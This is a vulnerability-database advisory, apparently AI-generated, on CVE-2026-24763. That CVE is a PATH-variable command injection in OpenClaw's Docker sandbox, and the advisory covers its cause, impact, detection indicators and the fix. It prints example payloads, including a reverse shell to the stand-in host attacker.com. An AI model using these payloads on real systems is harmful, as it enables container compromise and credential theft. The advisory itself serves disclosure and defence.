
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24763 is an authenticated OS command injection vulnerability in OpenClaw (formerly Clawdbot), a self-hosted personal AI assistant. The flaw exists in the Docker sandbox execution mechanism due to unsafe handling of the PATH environment variable when constructing shell commands, allowing an authenticated user who can control environment variables to inject arbitrary commands within the container context. It affects the clawdbot npm package versions up to and including 2026.1.24, and was fixed in version 2026.1.29. The advisory was published on January 31, 2026, with CVE assignment on February 2, 2026. The CVSS v3.1 base score is 8.8 (High) (GitHub Advisory, OpenClaw Security Advisory).
The root cause (CWE-78: Improper Neutralization of Special Elements used in an OS Command) lies in the buildDockerExecArgs function within src/agents/bash-tools.shared.ts. Before the fix, the user-supplied PATH environment variable was interpolated directly into the shell command string passed to docker exec sh -lc, producing a command like export PATH="<user-input>:$PATH"; <command>. An attacker could supply a value such as $(touch /tmp/pwned) or a command-substitution payload as the PATH value, which would be evaluated by the shell when the command string was executed inside the container. The fix passes the custom PATH via an intermediate environment variable (CLAWDBOT_PREPEND_PATH) using Docker's -e flag, then references it with ${CLAWDBOT_PREPEND_PATH} inside the shell command — preventing shell interpolation of attacker-controlled content. Exploitation requires the Docker sandbox mode to be enabled and the attacker to have authenticated access with the ability to supply environment variables (GitHub Advisory, Fix Commit).
Successful exploitation allows an authenticated attacker to execute arbitrary OS commands inside the Docker sandbox container, resulting in high confidentiality, integrity, and availability impact within the container scope. Consequences include execution of unintended commands, access to the container filesystem and environment variables (which may contain API keys or credentials), exposure of sensitive data, and potential for denial of service within the container. In misconfigured or privileged container environments, the risk of host escape or lateral movement is elevated (GitHub Advisory, OpenClaw Security Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit and no confirmed evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.066%–0.102%, placing it in the lower percentiles for near-term exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the broader OpenClaw ecosystem has attracted significant attention from threat researchers, with reports of tens of thousands of exposed OpenClaw instances and APT group interest noted in threat intelligence feeds (SecurityScorecard, The Daily Tech Feed). The vulnerability is detectable by Qualys (QID 5007332) and Nessus (plugin 297816).
PATH environment variable, such as $(touch /tmp/pwned) or a reverse shell payload like $(bash -i >& /dev/tcp/attacker.com/4444 0>&1).buildDockerExecArgs with the attacker-controlled PATH value. In the vulnerable code, this results in a shell command string like: export PATH="$(bash -i >& /dev/tcp/attacker.com/4444 0>&1):$PATH"; <command> being passed to docker exec sh -lc.docker exec invocations with unusual or shell-metacharacter-containing PATH values; unexpected shell errors or command-not-found messages from within the container.bash, curl, wget, nc, python) that are not part of normal agent operation; reverse shell connections originating from the container process./tmp/clawdbot-path-injection, web shells, or downloaded binaries); modifications to container environment files.CLAWDBOT_PREPEND_PATH environment variable with suspicious values in container inspection output (on patched versions, this is expected; on unpatched versions, the raw PATH value in shell commands is the indicator) (Fix Commit, GitHub Advisory).The vulnerability is fixed in OpenClaw version 2026.1.29 (npm package clawdbot / openclaw). Users should update immediately by running npm install openclaw@2026.1.29 or the equivalent package manager command. The fix commit (771f23d) refactors buildDockerExecArgs to pass the user-supplied PATH via Docker's -e CLAWDBOT_PREPEND_PATH=<value> flag and references it as ${CLAWDBOT_PREPEND_PATH} inside the shell command, eliminating direct interpolation. As interim mitigations: restrict authenticated access to trusted users only, apply the principle of least privilege for user accounts, avoid running Docker containers in privileged mode, and monitor for suspicious environment variable modifications and unexpected command execution patterns within OpenClaw Docker containers (GitHub Advisory, OpenClaw Release v2026.1.29).
The vulnerability attracted substantial coverage given OpenClaw's large user base (reportedly 378k GitHub stars). Tenable published a blog post on mitigating vulnerabilities in agentic AI tools including OpenClaw/Clawdbot, framing it as part of a broader class of AI agent security risks (Tenable Blog). SecurityScorecard and SecurityBoulevard highlighted that the real risk from OpenClaw is exposed infrastructure rather than AI-specific threats, with reports of over 40,000 exposed instances (SecurityScorecard, SecurityBoulevard). Kaspersky, Adversa AI, Cato Networks, and F5 Labs also published analyses, and the CVE appeared in multiple weekly CVE chatter top-ten lists from SOS Intelligence. Reddit discussions noted over 135,000 exposed OpenClaw instances, and community sentiment reflected concern about the security posture of self-hosted AI agents broadly (Reddit).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."